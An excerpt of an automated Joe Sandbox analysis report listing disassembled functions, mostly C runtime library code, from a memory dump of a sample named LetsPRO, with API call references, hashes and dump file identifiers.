                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C948FC3
                                        • InitializeSListHead.KERNEL32(000000E8), ref: 6C948FDC
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Policy$Concurrency@@ElementKey@2@@Policy@SchedulerValue@$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCriticalErrorH_prolog3LastSection$??2@InitializeThread$CountCreateCurrentEnterEventExceptionHeadLeaveListPrioritySpinThrow
                                        • String ID:
                                        • API String ID: 7361241-0
                                        • Opcode ID: 54560a21f59459091d168e7f71b0e3e853051592e8d887d1e0ad5890906cd619
                                        • Instruction ID: b570f65f92417d90c91ed7daa01df87f13fc6015fd0ba959c5cb6da54e4f4449
                                        • Opcode Fuzzy Hash: 54560a21f59459091d168e7f71b0e3e853051592e8d887d1e0ad5890906cd619
                                        • Instruction Fuzzy Hash: CA31A1B1500646DFC7149FA0C880EEEB7B9FF15348F50C82AE52AE7600DB34E959CB98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C941F37 Relevance: 15.1, APIs: 10, Instructions: 88COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_catch.LIBCMT ref: 6C941F3E
                                        • ??2@YAPAXI@Z.MSVCR100(00000024,0000003C,6C941F32,?,?,?,?,?,6C940452,?,00000000,6C9A55E0,0000000C,6C9403B2,?,?), ref: 6C941F47
                                          • Part of subcall function 6C90235B: malloc.MSVCR100(?), ref: 6C902366
                                        • memcpy.MSVCR100(00000000,6C9A7310,00000024,0000003C,6C941F32,?,?,?,?,?,6C940452,?,00000000,6C9A55E0,0000000C,6C9403B2), ref: 6C941F64
                                        • std::exception::exception.LIBCMT(?,?,6C9A0EC8,?,00000002,00000001), ref: 6C941F97
                                        • _CxxThrowException.MSVCR100(?,6C9A0EC8,?,00000002,00000001), ref: 6C941FAC
                                        • std::exception::exception.LIBCMT(?,6C933AC0,6C9A0EAC,?), ref: 6C941FCB
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000001), ref: 6C941FEE
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002,00000001), ref: 6C941FF9
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT(00000002,00000001), ref: 6C94200F
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT(?,00000002,00000001), ref: 6C94202B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Policy$Concurrency::unsupported_os::unsupported_osConcurrency@@ElementKey@2@@Policy@SchedulerValue@std::exception::exception$??2@ExceptionH_prolog3_catchThrowmallocmemcpy
                                        • String ID:
                                        • API String ID: 1209366282-0
                                        • Opcode ID: 6a28ab9040be635d94aedca13b25d7a682e3b234faf84e09489cf00a52c78eff
                                        • Instruction ID: 37adbd6ab06158f9fef365029c078dcee472d2ee92559bde25d773b8e59e0ab0
                                        • Opcode Fuzzy Hash: 6a28ab9040be635d94aedca13b25d7a682e3b234faf84e09489cf00a52c78eff
                                        • Instruction Fuzzy Hash: 7931C272A006089BCF04DFA4C8859DDB7B5BF65348B10C526E405EBF80DB70EA1ACB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C917F19 Relevance: 15.1, APIs: 10, Instructions: 87COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100(?,?,?,?,6C917F14,?,?,?,?,00000000,?), ref: 6C917F4C
                                        • _errno.MSVCR100(?,6C917F14,?,?,?,?,00000000,?), ref: 6C92944C
                                        • _invalid_parameter_noinfo.MSVCR100(?,6C917F14,?,?,?,?,00000000,?), ref: 6C929457
                                        • _errno.MSVCR100(?,?,?,?,6C917F14,?,?,?,?,00000000,?), ref: 6C929475
                                        • _errno.MSVCR100 ref: 6C929482
                                        • _errno.MSVCR100 ref: 6C92948C
                                        • _errno.MSVCR100 ref: 6C9294BC
                                        • _errno.MSVCR100 ref: 6C9294C6
                                        • _errno.MSVCR100 ref: 6C9294D9
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,6C917F14,?,?,?,?,00000000,?), ref: 6C9294E4
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2819658684-0
                                        • Opcode ID: df50493cc8b0e37f86823380b618c6b3500c18ccf0409218cc2612b76d1250d6
                                        • Instruction ID: 33a176a7dcb690942b4eb1e327d660624233f913bfe7a041dc5e1e442820e6cc
                                        • Opcode Fuzzy Hash: df50493cc8b0e37f86823380b618c6b3500c18ccf0409218cc2612b76d1250d6
                                        • Instruction Fuzzy Hash: 2721E531A14625EBCB211F65D8405CE3638BF6233CB160798E9B84BFE5CB39C454C7A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C910CB7 Relevance: 15.1, APIs: 10, Instructions: 85COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _lock.MSVCR100(00000007,6C910D28,0000000C), ref: 6C910CC5
                                          • Part of subcall function 6C900940: EnterCriticalSection.KERNEL32(00000001,00000001,?,6C901F15,0000000D), ref: 6C90095B
                                        • _wcslen.LIBCMT(00000000,6C910D28,0000000C), ref: 6C910D45
                                        • calloc.MSVCR100(00000001,00000002,00000000,6C910D28,0000000C), ref: 6C910D50
                                        • wcscpy_s.MSVCR100(00000000,00000001,00000000), ref: 6C910D67
                                        • _errno.MSVCR100(6C910D28,0000000C), ref: 6C93092F
                                        • _invalid_parameter_noinfo.MSVCR100(6C910D28,0000000C), ref: 6C930939
                                        • _errno.MSVCR100 ref: 6C93094A
                                        • _errno.MSVCR100 ref: 6C930955
                                          • Part of subcall function 6C910C46: _wcslen.LIBCMT(00000000,?,00000000,?,6C910D07,?,6C910D28,0000000C), ref: 6C910C68
                                          • Part of subcall function 6C910C46: _wcslen.LIBCMT(00000000,?,00000000,?,6C910D07,?,6C910D28,0000000C), ref: 6C910C7B
                                          • Part of subcall function 6C910C46: _wcsnicoll.MSVCR100(00000000,00000000,00000000,?,00000000,?,6C910D07,?,6C910D28,0000000C), ref: 6C910C98
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_wcslen$CriticalEnterSection_invalid_parameter_noinfo_lock_wcsnicollcallocwcscpy_s
                                        • String ID:
                                        • API String ID: 2000213683-0
                                        • Opcode ID: f82d4233b1da852574b3562c6f55664a90d0e3a5bdd1282bd6dd56277c2cf2f3
                                        • Instruction ID: 85db77685730f3c944e3e5f147db6c450662469d66da0453cf2edabd7a13f97c
                                        • Opcode Fuzzy Hash: f82d4233b1da852574b3562c6f55664a90d0e3a5bdd1282bd6dd56277c2cf2f3
                                        • Instruction Fuzzy Hash: 2E213170A48AA9DFD7029F688C4258E3778BF65B24F21A415E02C9BF40DB71D9548BD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9179D8 Relevance: 15.1, APIs: 10, Instructions: 85COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _lock.MSVCR100(00000008,6C917AA8,00000018,6C94BFB7,00000001,00000001,00000000,?,6C94BFE8,000000FF,?,6C927547,00000011,00000001,?,6C901F15), ref: 6C9179FA
                                        • DecodePointer.KERNEL32(6C917AA8,00000018,6C94BFB7,00000001,00000001,00000000,?,6C94BFE8,000000FF,?,6C927547,00000011,00000001,?,6C901F15,0000000D), ref: 6C917A34
                                        • DecodePointer.KERNEL32(?,6C94BFE8,000000FF,?,6C927547,00000011,00000001,?,6C901F15,0000000D), ref: 6C917A49
                                        • _encoded_null.MSVCR100(?,6C94BFE8,000000FF,?,6C927547,00000011,00000001,?,6C901F15,0000000D), ref: 6C917A60
                                        • DecodePointer.KERNEL32(-00000004,?,6C94BFE8,000000FF,?,6C927547,00000011,00000001,?,6C901F15,0000000D), ref: 6C917A6F
                                        • _encoded_null.MSVCR100(?,6C94BFE8,000000FF,?,6C927547,00000011,00000001,?,6C901F15,0000000D), ref: 6C917A73
                                        • DecodePointer.KERNEL32(?,6C94BFE8,000000FF,?,6C927547,00000011,00000001,?,6C901F15,0000000D), ref: 6C917A82
                                        • DecodePointer.KERNEL32(?,6C94BFE8,000000FF,?,6C927547,00000011,00000001,?,6C901F15,0000000D), ref: 6C917A8C
                                          • Part of subcall function 6C91792C: GetModuleHandleW.KERNEL32(00000000,6C9179F0,6C917AA8,00000018,6C94BFB7,00000001,00000001,00000000,?,6C94BFE8,000000FF,?,6C927547,00000011,00000001), ref: 6C91792E
                                        • ___crtCorExitProcess.LIBCMT ref: 6C927445
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: DecodePointer$_encoded_null$ExitHandleModuleProcess___crt_lock
                                        • String ID:
                                        • API String ID: 729311798-0
                                        • Opcode ID: dce0a1209e0e4ccfb4303ba4169ca60f88a505196b5ca0ae480f285722ba7d70
                                        • Instruction ID: a1e688e4dd12beaedb1e6b43e8ad7bba5cbcfb7b166f8fdc7f665176274ee2e3
                                        • Opcode Fuzzy Hash: dce0a1209e0e4ccfb4303ba4169ca60f88a505196b5ca0ae480f285722ba7d70
                                        • Instruction Fuzzy Hash: 09316D30A0964FEEEF009FB5C8416DD7AF5BF69319F24412AD410A6E90DBB4CA48CF54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C94AAC4 Relevance: 15.1, APIs: 10, Instructions: 80librarythreadCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleA.KERNEL32(00000000), ref: 6C94AADB
                                        • GetModuleFileNameW.KERNEL32(6C8F0000,?,00000104), ref: 6C94AAF7
                                        • LoadLibraryW.KERNEL32(?), ref: 6C94AB08
                                        • GetLastError.KERNEL32 ref: 6C94AB1F
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C94AB3A
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000), ref: 6C94AB4B
                                        • CreateThread.KERNEL32(00000000,-00000018,6C940F33,00010000,6C940F21,?), ref: 6C94AB8D
                                        • GetLastError.KERNEL32 ref: 6C94AB97
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C94ABAF
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000), ref: 6C94ABBD
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorExceptionLastModuleThrow$CreateFileHandleLibraryLoadNameThread
                                        • String ID:
                                        • API String ID: 475412-0
                                        • Opcode ID: e2371a71d1632e29474fbd589890c8a71dda2e6c57d4010bc69115937424c82b
                                        • Instruction ID: 037c157c6475a9d15c69b0e7c055ecd6d66edb8a407e01f44dddccbb4d45bc50
                                        • Opcode Fuzzy Hash: e2371a71d1632e29474fbd589890c8a71dda2e6c57d4010bc69115937424c82b
                                        • Instruction Fuzzy Hash: 5F21DE71600249ABDB189FA0D809FAE3778BF54388F10447AE526D6A80DF35D905DB98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C97C474 Relevance: 15.1, APIs: 10, Instructions: 72COMMON
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100 ref: 6C97C482
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C97C48C
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _wcslen.LIBCMT(?), ref: 6C97C4AF
                                        • wcscpy_s.MSVCR100(?,?,?), ref: 6C97C4BF
                                        • wcscat_s.MSVCR100(?,?,6C933260), ref: 6C97C4D2
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000), ref: 6C97C4E5
                                        • _errno.MSVCR100 ref: 6C97C4EA
                                        • _wcslen.LIBCMT(?,00000000), ref: 6C97C4F2
                                        • _wcslen.LIBCMT(?,?,00000000), ref: 6C97C4FC
                                        • _wcserror_s.MSVCR100(00000000,?,00000000), ref: 6C97C506
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _wcslen$_errno$__invoke_watson_invalid_parameter_invalid_parameter_noinfo_wcserror_swcscat_swcscpy_s
                                        • String ID:
                                        • API String ID: 998693625-0
                                        • Opcode ID: 711d90821a94322ab2104b13b839ffcce67c1bc23e81dca357d07b67c9d7b602
                                        • Instruction ID: 194346daab6aeec948a2e1173a413569673899536d01d03f643937d382084015
                                        • Opcode Fuzzy Hash: 711d90821a94322ab2104b13b839ffcce67c1bc23e81dca357d07b67c9d7b602
                                        • Instruction Fuzzy Hash: 8C110836742514A79B313B795C88DFF3B6CAFB1A6C714002AEC18D7E00EB21C41882F2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C904708 Relevance: 15.1, APIs: 10, Instructions: 70memoryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • HeapReAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,?,6C9047D9,?,00000001,00000000,00000000,?,6C930686,00000000,00000010), ref: 6C904741
                                        • malloc.MSVCR100(00000001,?,6C9047D9,?,00000001,00000000,00000000,?,6C930686,00000000,00000010), ref: 6C9047BD
                                        • free.MSVCR100(00000000,00000000,?,6C9047D9,?,00000001,00000000,00000000,?,6C930686,00000000,00000010), ref: 6C92F3AF
                                        • _callnewh.MSVCR100(00000001,?,6C9047D9,?,00000001,00000000,00000000,?,6C930686,00000000,00000010), ref: 6C92F3CB
                                        • _callnewh.MSVCR100(00000001,00000000,00000000,?,6C9047D9,?,00000001,00000000,00000000,?,6C930686,00000000,00000010), ref: 6C92F3DC
                                        • _errno.MSVCR100(00000000,00000000,?,6C9047D9,?,00000001,00000000,00000000,?,6C930686,00000000,00000010), ref: 6C92F3E2
                                        • _errno.MSVCR100(?,6C9047D9,?,00000001,00000000,00000000,?,6C930686,00000000,00000010,?,?,?,?,?,6C90AA43), ref: 6C92F3F4
                                        • GetLastError.KERNEL32(?,6C9047D9,?,00000001,00000000,00000000,?,6C930686,00000000,00000010,?,?,?,?,?,6C90AA43), ref: 6C92F3FB
                                        • _errno.MSVCR100(?,6C9047D9,?,00000001,00000000,00000000,?,6C930686,00000000,00000010,?,?,?,?,?,6C90AA43), ref: 6C92F40C
                                        • GetLastError.KERNEL32(?,6C9047D9,?,00000001,00000000,00000000,?,6C930686,00000000,00000010,?,?,?,?,?,6C90AA43), ref: 6C92F413
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$ErrorLast_callnewh$AllocHeapfreemalloc
                                        • String ID:
                                        • API String ID: 2627451454-0
                                        • Opcode ID: b9d29494de739ac19456c523321d532bec0b1da1498f973b812ab9dc81e147f4
                                        • Instruction ID: 7c66d49f60eb8c69f0f18a39d06cf5d0d90609e99ccb78cae9138d393441230c
                                        • Opcode Fuzzy Hash: b9d29494de739ac19456c523321d532bec0b1da1498f973b812ab9dc81e147f4
                                        • Instruction Fuzzy Hash: AB11EB32705611ABCB112F78A80478E3BA9BF767EDB20552DE868DAE54DF35C8448FD0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C94C671 Relevance: 15.1, APIs: 10, Instructions: 63threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100 ref: 6C94C681
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C94C68C
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • __set_flsgetvalue.MSVCR100 ref: 6C94C696
                                        • _calloc_crt.MSVCR100(00000001,00000214), ref: 6C94C6A2
                                        • _getptd.MSVCR100 ref: 6C94C6AF
                                        • _initptd.MSVCR100(00000000,?), ref: 6C94C6B8
                                        • CreateThread.KERNEL32(?,?,6C94C60C,00000000,?,?), ref: 6C94C6E6
                                        • GetLastError.KERNEL32 ref: 6C94C6F0
                                        • free.MSVCR100(00000000), ref: 6C94C6F9
                                        • __dosmaperr.LIBCMT(00000000), ref: 6C94C704
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CreateErrorLastThread__dosmaperr__set_flsgetvalue_calloc_crt_errno_getptd_initptd_invalid_parameter_invalid_parameter_noinfofree
                                        • String ID:
                                        • API String ID: 2355482382-0
                                        • Opcode ID: 7a1852e0843910d99600e21420e7ae0db5ebd40ef19fcb29319db093803889b4
                                        • Instruction ID: 97f8521645359cf25e847e9ddf16be7b38f524cd62486fe48c32f7a7fbba2016
                                        • Opcode Fuzzy Hash: 7a1852e0843910d99600e21420e7ae0db5ebd40ef19fcb29319db093803889b4
                                        • Instruction Fuzzy Hash: 6B11E532205746AFDB11AFA69C80DCF3BE8EF6576C710852DF91896A50DB71C80987A4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C902E18 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 242COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __aulldvrm__forcdecpt_l_errno_get_printf_count_output_strlen
                                        • String ID: @$@$g
                                        • API String ID: 3086443751-3810856864
                                        • Opcode ID: d8d8428d5d96500e785b8c9b81f9f77a8dba9e7f84154bda3cb54d0db6bae928
                                        • Instruction ID: 5458702a2d56b0787995d38b9256f6c6728581ffd1c727dcbdc30d3b5742e828
                                        • Opcode Fuzzy Hash: d8d8428d5d96500e785b8c9b81f9f77a8dba9e7f84154bda3cb54d0db6bae928
                                        • Instruction Fuzzy Hash: E0A159F1A056688EDB608F24CC84B98B7B8BB55318F1442EDD648B7A41E731DAC5CF68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90DC9C Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 171COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • DName::operator=.LIBCMT ref: 6C911624
                                        • atol.MSVCR100(?,?,00000010,00000000,00000000,00000000), ref: 6C92D6BB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Name::operator=atol
                                        • String ID: `template-parameter$void
                                        • API String ID: 1388095176-4057429177
                                        • Opcode ID: 27ad1f9e2dc986e8a421078dd706ba4503c5f20b9e539ce581655207431576bc
                                        • Instruction ID: 3fbd6e318698c9cf3fb8d533bf5eb58cd4024dbfd3aea7151327e20ebc91be07
                                        • Opcode Fuzzy Hash: 27ad1f9e2dc986e8a421078dd706ba4503c5f20b9e539ce581655207431576bc
                                        • Instruction Fuzzy Hash: CB511672B052089FCB00DFE8D8909EDBBB9AF19704F60402EE555A7B40E735DA49CB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C916A5D Relevance: 13.7, APIs: 9, Instructions: 226COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT(?,000000FF,00000024,?,?,6C916A58,?), ref: 6C916A7D
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C916AB8
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C916B75
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C916BCE
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C916BEB
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C916C0E
                                        • _errno.MSVCR100(?,?,6C916A58,?), ref: 6C929D82
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,6C916A58,?), ref: 6C929D8C
                                        • _errno.MSVCR100(?,?,?,?,6C916A58,?), ref: 6C929DA6
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$_errno$_invalid_parameter_noinfo_memset
                                        • String ID:
                                        • API String ID: 1299486453-0
                                        • Opcode ID: 34dde7080fd8fe797ca347a62963af7269bc454f958ba71e527c9920dcfb0d5c
                                        • Instruction ID: 93aa09c6a239e8824b9de87f51d235cd2595bfb67b9e1b33b06d1e99c505489b
                                        • Opcode Fuzzy Hash: 34dde7080fd8fe797ca347a62963af7269bc454f958ba71e527c9920dcfb0d5c
                                        • Instruction Fuzzy Hash: 11612572F48209AFD7149F68CC41BAE77BAEF94318F15822DF550DBA81D779DA008B40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9042FF Relevance: 13.7, APIs: 9, Instructions: 169COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
